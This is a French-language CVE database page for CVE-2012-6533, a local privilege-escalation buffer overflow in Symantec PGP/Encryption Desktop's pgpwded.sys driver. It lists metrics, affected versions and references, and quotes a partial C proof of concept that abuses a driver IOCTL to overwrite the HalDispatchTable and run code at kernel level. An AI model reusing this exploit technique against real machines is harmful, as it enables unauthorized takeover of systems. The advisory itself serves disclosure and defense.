CVE-2012-6533 : Détail

CVE-2012-6533

Overflow
0.06%V3
Local
2013-02-18
11h00 +00:00
2024-09-17
03h22 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in pgpwded.sys in Symantec PGP Desktop 10.x and Encryption Desktop 10.3.0 before MP1 on Windows XP and Server 2003 allows local users to gain privileges via a crafted application.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.4 AV:L/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 38299

Date de publication : 2012-02-24 23h00 +00:00
Auteur : Nikita Tarakanov
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/57835/info Symantec Encryption Desktop is prone to a local buffer-overflow vulnerability. A local attacker may exploit this issue to execute arbitrary code with escalated privileges. #define IO_CONTROL_VULN 0x80022058 #define TARGET_DEVICE L"\\Device\\pgpwdef" [..] usName.Buffer = TARGET_DEVICE; usName.Length = usName.MaximumLength = (USHORT)(wcslen(usName.Buffer) * sizeof(WCHAR)); InitializeObjectAttributes(&ObjAttr, &usName, OBJ_CASE_INSENSITIVE , NULL, NULL); // get handle of target devide ns = f_NtOpenFile( &hDev, FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE, &ObjAttr, &StatusBlock, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_SYNCHRONOUS_IO_NONALERT ); [..] BOOL bStatus = DeviceIoControl( hDev, IO_CONTROL_VULN, InBuff, 0x8, OutBuff, 0x8, &dwReturnLen, NULL ); dwReturnLen = 0; bStatus = DeviceIoControl( hDev, IO_CONTROL_VULN, InBuff, sizeof(PVOID), (PUCHAR)m_HalDispatchTable, 0, &dwReturnLen, NULL ); [..] f_NtQueryIntervalProfile(ProfileTotalIssues, &Interval); [..] Your evil code processes with CPL==0

Products Mentioned

Configuraton 0

Symantec>>Pgp_desktop >> Version 10.0.0

Symantec>>Pgp_desktop >> Version 10.0.1

Symantec>>Pgp_desktop >> Version 10.0.2

Symantec>>Pgp_desktop >> Version 10.0.3

Symantec>>Pgp_desktop >> Version 10.1.0

Symantec>>Pgp_desktop >> Version 10.1.1

Symantec>>Pgp_desktop >> Version 10.1.2

Symantec>>Pgp_desktop >> Version 10.2.0

Symantec>>Pgp_desktop >> Version 10.2.1

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_xp >> Version *

Configuraton 0

Symantec>>Encryption_desktop >> Version 10.3.0

Références

http://www.securityfocus.com/bid/57835
Tags : vdb-entry, x_refsource_BID